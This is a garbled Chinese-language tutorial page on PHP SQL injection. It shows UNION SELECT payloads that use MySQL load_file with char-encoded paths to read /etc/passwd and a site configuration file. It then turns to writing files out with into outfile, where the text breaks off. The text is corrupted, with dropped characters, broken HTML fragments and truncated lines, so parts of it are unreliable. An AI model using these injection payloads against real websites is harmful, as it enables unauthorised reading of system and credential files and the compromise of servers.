文档介绍:php注入:php注入窍门技巧
疯狂代码 / ĵ:http:/
于 max_allowed_packet
如果该文件不存在或上面任原因而不能被读出返回空比较难满足就是权限在windows下如果NTFS设置得
当是不能读取相关文件当遇到只有administrators才能访问文件users就别想load_file出来
在实际注入中我们有两个难点需要解决:
绝对物理路径
构造有效畸形语句
在很多PHP中当提交个Query如果display_errors = _disibledevent=>服务器安全将受到严重威胁构造语
句已经是小意思了
我们这里用load_file(char)这个我们需要把/etc/passwd转化成16进制我们请出asc2chr这个工具来帮我们完
成转化工作
如图 3
" align=baseline border=0>
我们很轻松就得到了/etc/passwd16进制格式
下面就是构建语句了
_file(char(47,101,116,99,47,112,97,115,115,119,100)),6,5,4,3,2,1">
?id=282%20and%201=2%20union%20select%2050,9,8,load_file(char(47,101,116,99,47,112,97,1
15,115,119,100)),6,5,4,3,2,1
很轻松就得到了/etc/passwd文件大家看下图片
如图4
" align=baseline border=0>下面我们就要想办法来读取config配置文件了前面我们得到了web路径所以读取就很轻松了
构建语句
_file(char(47,104,111,109,101,47,110,101,119,103,116,47,115,104,111,119,98,111,97,114,100,46,112,10
4,112)),6,5,4,3,2,1">//?id=282%20and%201=2%20union%20
select%2050,9,8,load_file(char(47,104,111,109,101,47,110,101,119,103,116,47,115,104,111,119,98,111,
97,114,100,46,112,104,112)),6,5,4,3,2,1
如图 5
" align=baseline border=0>
可是和我们想不样并没有得到php源代码原来php代码再服务器端执行了这个时候我们可以用angel办法利用
o outfile来把要读取文件备份到服务器上可是我没有这